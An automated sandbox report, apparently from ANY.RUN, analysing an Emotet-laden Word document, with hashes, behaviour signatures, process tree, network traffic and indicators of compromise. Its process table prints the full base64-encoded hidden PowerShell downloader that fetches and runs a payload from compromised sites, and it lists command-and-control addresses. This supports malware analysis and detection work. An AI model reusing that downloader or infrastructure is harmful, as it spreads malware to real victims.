analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

X.doc

Full analysis: https://app.any.run/tasks/0d9ae8b6-fe17-4772-99a7-8530a1fff4a3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 18:55:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Cum beatae et., Author: Giulia Holdt, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 16:28:00 2019, Last Saved Time/Date: Fri Dec 6 16:28:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 336, Security: 0
MD5:

0C1E4EF2CC1F522AF953DF3B51DC085D

SHA1:

0A613275923C8C235BFA38D0EF3FA1448DD5459F

SHA256:

412659B218BE1ADCC953526E19B2FE6CAC47C5257D1E45699387BEE381C02A38

SSDEEP:

6144:l7AtOKO+FT7qF2k4etGiL3HJkEyD7baRDvys0DeR:l7AtOKO+FT7qF3Qitk/7baRZ0DeR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 47.exe (PID: 944)
      • 47.exe (PID: 3864)
      • serialfunc.exe (PID: 1596)
      • serialfunc.exe (PID: 3812)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1756)
    • Emotet process was detected

      • 47.exe (PID: 944)
    • EMOTET was detected

      • serialfunc.exe (PID: 1596)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 1596)
    • Connects to CnC server

      • serialfunc.exe (PID: 1596)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 1756)
    • Executable content was dropped or overwritten

      • 47.exe (PID: 944)
      • powershell.exe (PID: 1756)
    • PowerShell script executed

      • powershell.exe (PID: 1756)
    • Application launched itself

      • 47.exe (PID: 3864)
    • Creates files in the user directory

      • powershell.exe (PID: 1756)
    • Starts itself from another location

      • 47.exe (PID: 944)
    • Connects to server without host name

      • serialfunc.exe (PID: 1596)
    • Connects to unusual port

      • serialfunc.exe (PID: 1596)
    • Connects to SMTP port

      • serialfunc.exe (PID: 1596)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2572)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2572)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Forms 2.0 Form
CompObjUserTypeLen: 25
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 393
Paragraphs: 1
Lines: 2
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 336
Words: 58
Pages: 1
ModifyDate: 2019:12:06 16:28:00
CreateDate: 2019:12:06 16:28:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Giulia Holdt
Subject: -
Title: Cum beatae et.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 47.exe no specs #EMOTET 47.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2572"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\X.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1756powershell -w hidden -en JABYAGgAZABlAGQAYQBiAHoAbgB1AGEAYQA9ACcAVwB4AGcAaQBiAHcAYwBuAHgAdwAnADsAJABLAHkAcgB1AGIAdQBxAGsAbgB0ACAAPQAgACcANAA3ACcAOwAkAEoAYgByAGYAaABuAGwAcwBnAGcAbAByAD0AJwBZAHYAcQB4AHIAeQBzAHkAdABkAGYAJwA7ACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEsAeQByAHUAYgB1AHEAawBuAHQAKwAnAC4AZQB4AGUAJwA7ACQATwBrAGsAaABkAG8AZgByAHkAdgA9ACcATQBrAHEAcQBxAHUAcQBuAGoAZQBzAGcAJwA7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAD0AJgAoACcAbgAnACsAJwBlACcAKwAnAHcALQBvAGIAagBlAGMAdAAnACkAIABOAGUAVAAuAFcAZQBiAEMATABpAEUATgB0ADsAJABVAHAAeQB4AG0AdgBmAHMAcABuAGIAdQA9ACcAaAB0AHQAcAA6AC8ALwByAG0AYwBlAG4AdAByAGUALgBiAGkAZwBmAGkAbABtAHAAcgBvAGQAdQBjAHQAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEwAcgBPAHEAaAAvACoAaAB0AHQAcAA6AC8ALwBsAGUAYwBhAGQAZQBhAHUAZwBvAHUAcgBtAGEAbgBkAC4AZgByAC8ANAA3AG0AbgAwADQALwBvAFMAOABEAGsAVgAvACoAaAB0AHQAcAA6AC8ALwBkAGEAdABuAGUAbgB0AGEAeQBoAGEAbgBvAGkALgBpAG4AZgBvAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAB5AFoAcgBkAGQAZwAvACoAaAB0AHQAcAA6AC8ALwBiAGkAZQB0AHQAaAB1AHYAaQBuAGgAbwBtAGUAcwBnAGkAYQBsAGEAbQAuAHgAeQB6AC8AYwBnAGkALQBiAGkAbgAvAGEAYwBCADQAcQA0AHkALwAqAGgAdAB0AHAAOgAvAC8AYwBsAGkAYwBrAGIAYQBuAGsAYgByAGUAYQBrAHMAdABoAGUAaQBuAHQAZQByAG4AZQB0AC4AYwBvAG0ALwBvAEEANgBlAG4ASQA4AC8AJwAuACIAUwBwAGAATABJAHQAIgAoACcAKgAnACkAOwAkAFEAYwBsAGkAbwBhAHAAZQB3AGkAPQAnAEkAZABoAHYAYQB6AGEAZQBmAG4AYgBoAGMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEsAaAB3AGQAbwBsAGEAdwBoAHUAcwBqAHYAIABpAG4AIAAkAFUAcAB5AHgAbQB2AGYAcwBwAG4AYgB1ACkAewB0AHIAeQB7ACQAWQB5AGEAbQBzAGEAZQB4AGcAcQBpAC4AIgBEAG8AYAB3AG4AYABsAE8AYABBAEQAZgBpAEwARQAiACgAJABLAGgAdwBkAG8AbABhAHcAaAB1AHMAagB2ACwAIAAkAEIAcwBhAHQAYwBxAG4AagBwAHYAbgBvACkAOwAkAEUAegBrAHIAZABpAHQAeABkAGcAcQA9ACcARQBoAG8AaQB1AHMAbQBuAGYAbgBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQAuACIAbABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADQANwAxADYAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAHQAIgAoACQAQgBzAGEAdABjAHEAbgBqAHAAdgBuAG8AKQA7ACQARQBkAGEAZABmAGYAbABrAGYAbABxAHMAPQAnAEYAZQBwAGoAcgBsAHoAeAB5AHQAbQAnADsAYgByAGUAYQBrADsAJABCAHkAbABnAHkAeABuAHAAdABjAGMAbABjAD0AJwBDAGQAcgBjAGMAeABoAGIAeQB1AGIAdQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAGgAcgB1AGoAagBtAHQAZQA9ACcAQwB6AGwAYwBuAHkAcABoAGYAdQB2AGIAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3864"C:\Users\admin\47.exe" C:\Users\admin\47.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
944--c57b844dC:\Users\admin\47.exe
47.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
3812"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe47.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
1596--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Version:
1, 0, 0, 1
Total events
2 268
Read events
1 442
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2572WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5EF.tmp.cvr
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6425F8E8.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85C213C9.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5E1736.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F4CB1BF.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\915E20B4.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14636125.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1E5DACE2.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFB5D37B.wmf
MD5:
SHA256:
2572WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D581BF40.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
74
DNS requests
65
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1596
serialfunc.exe
POST
200
107.2.2.28:80
http://107.2.2.28/UevRLDmi
US
binary
1.38 Mb
malicious
1756
powershell.exe
GET
200
206.221.182.74:80
http://rmcentre.bigfilmproduction.com/wp-includes/LrOqh/
US
executable
492 Kb
malicious
1596
serialfunc.exe
POST
200
162.241.92.219:8080
http://162.241.92.219:8080/EGktwl5
US
binary
148 b
malicious
1596
serialfunc.exe
POST
162.241.92.219:8080
http://162.241.92.219:8080/hyrnV3u8RUSLjWibM
US
malicious
1596
serialfunc.exe
POST
192.241.131.79:8080
http://192.241.131.79:8080/1FxI0ATTg2
US
malicious
1596
serialfunc.exe
POST
200
162.241.92.219:8080
http://162.241.92.219:8080/21RVaGJBxUgjk2bDnZ
US
binary
132 b
malicious
1596
serialfunc.exe
POST
200
192.241.131.79:8080
http://192.241.131.79:8080/uIqrEZPnY7
US
binary
2.17 Mb
malicious
1596
serialfunc.exe
POST
200
162.241.92.219:8080
http://162.241.92.219:8080/EGktwl5
US
binary
148 b
malicious
1596
serialfunc.exe
POST
37.157.195.120:7080
http://37.157.195.120:7080/lDwIXJMqW
CZ
malicious
1596
serialfunc.exe
POST
200
107.2.2.28:80
http://107.2.2.28/EGktwl5
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1756
powershell.exe
206.221.182.74:80
rmcentre.bigfilmproduction.com
Choopa, LLC
US
malicious
1596
serialfunc.exe
162.241.92.219:8080
CyrusOne LLC
US
malicious
1596
serialfunc.exe
107.2.2.28:80
Comcast Cable Communications, LLC
US
malicious
1596
serialfunc.exe
211.13.204.5:25
pop.ways-wp.co.jp
Computer Engineering & Consulting, Ltd.
JP
unknown
1596
serialfunc.exe
37.157.195.120:7080
WEDOS Internet, a.s.
CZ
malicious
1596
serialfunc.exe
192.241.131.79:8080
Digital Ocean, Inc.
US
malicious
1596
serialfunc.exe
213.149.221.139:25
posta.cdobg.it
BiG TLC S.r.l.
IT
unknown
1596
serialfunc.exe
69.90.161.80:25
mail.scopedistributors.com.au
Peer 1 Network (USA) Inc.
CA
suspicious
1596
serialfunc.exe
217.116.0.228:587
smtp.resgreen.es
acens Technologies, S.L.
ES
malicious
1596
serialfunc.exe
185.80.48.119:587
mail.nethely.hu
Rackforest Informatikai Kereskedelmi Szolgaltato es Tanacsado Kft.
HU
unknown

DNS requests

Domain
IP
Reputation
rmcentre.bigfilmproduction.com
  • 206.221.182.74
malicious
pop3.urengroup.com
  • 205.204.101.151
unknown
pop.ways-wp.co.jp
  • 211.13.204.5
unknown
mailhost.ssg.nl
  • 149.210.249.75
unknown
smtp.oval.it
  • 217.194.6.35
unknown
mail.scopedistributors.com.au
  • 69.90.161.80
suspicious
mail.comercialautomotriz.com.mx
unknown
pop.gmail.com
  • 74.125.133.109
  • 74.125.133.108
shared
mail.nethely.hu
  • 185.80.48.119
unknown
mail.gmail.com
suspicious

Threats

PID
Process
Class
Message
1756
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1756
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1756
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1596
serialfunc.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
1596
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1596
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1596
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1596
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
1596
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
1596
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
No debug info